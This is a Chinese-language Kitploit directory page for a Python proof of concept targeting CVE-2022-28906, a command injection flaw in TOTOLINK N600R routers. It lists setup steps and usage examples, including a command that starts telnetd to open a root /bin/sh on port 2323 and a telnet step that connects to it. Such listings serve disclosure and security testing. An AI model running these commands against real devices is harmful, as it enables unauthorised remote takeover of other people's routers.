Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-28906-POC — Python 概念验证,针对 TOTOLINK N600R 中未经认证的 OS 命令注入漏洞,利用 langType 参数在设备上执行任意命令。 | Kitploit
工具/GitHubGitHub/finnvle/cve-2022-28906-poc
物联网安全漏洞分析漏洞利用Web应用程序漏洞利用命令与控制硬件与物联网安全
GitHubfinnvle/cve-2022-28906-poc

CVE-2022-28906-POC

Python 概念验证,针对 TOTOLINK N600R 中未经认证的 OS 命令注入漏洞,利用 langType 参数在设备上执行任意命令。

查看仓库
1822天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-28906 PoC

针对 TOTOLINK N600R 中未授权命令注入漏洞的 Python 概念验证。

Python CVSS

漏洞信息

产品TOTOLINK N600R
固件版本V5.3c.7159_B20190425
漏洞类型操作系统命令注入(CWE-78)
受影响参数langType
端点/cgi-bin/cstecgi.cgi
CVSS v3.19.8 严重

TOTOLink N600R V5.3c.7159_B20190425 被发现存在命令注入漏洞,该漏洞位于 /setting/setLanguageCfg 中的 langtype 参数。

环境搭建

root@kitploit:~
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt

使用方法

root@kitploit:~
# 用法:python3 poc.py <目标IP> <命令>
# 示例:python3 poc.py 192.168.68.1 "reboot"
# 示例:python3 poc.py 192.168.68.1 "telnetd -p 2323 -l /bin/sh"

python3 poc.py <目标IP> <命令>

概念验证示例

使用 PoC 远程执行目标设备,使其在 2323 端口上提供 /bin/sh 服务

root@kitploit:~
python3 poc.py 192.168.68.1 "telnetd -p 2323 -l /bin/sh"

Successful PoC response

查看 2323 端口是否已开启的结果

Nmap showing port 2323 open

通过 2323 端口使用 telnet 连接目标设备

root@kitploit:~
telnet 192.168.68.1 2323

Root shell validation

参考链接

  • NVD — CVE-2022-28906
  • CVE 记录 — CVE-2022-28906
  • CWE-78 — 操作系统命令注入

免责声明

按原样提供,不附带任何保证。作者不对滥用或造成的损害负责。

下载工具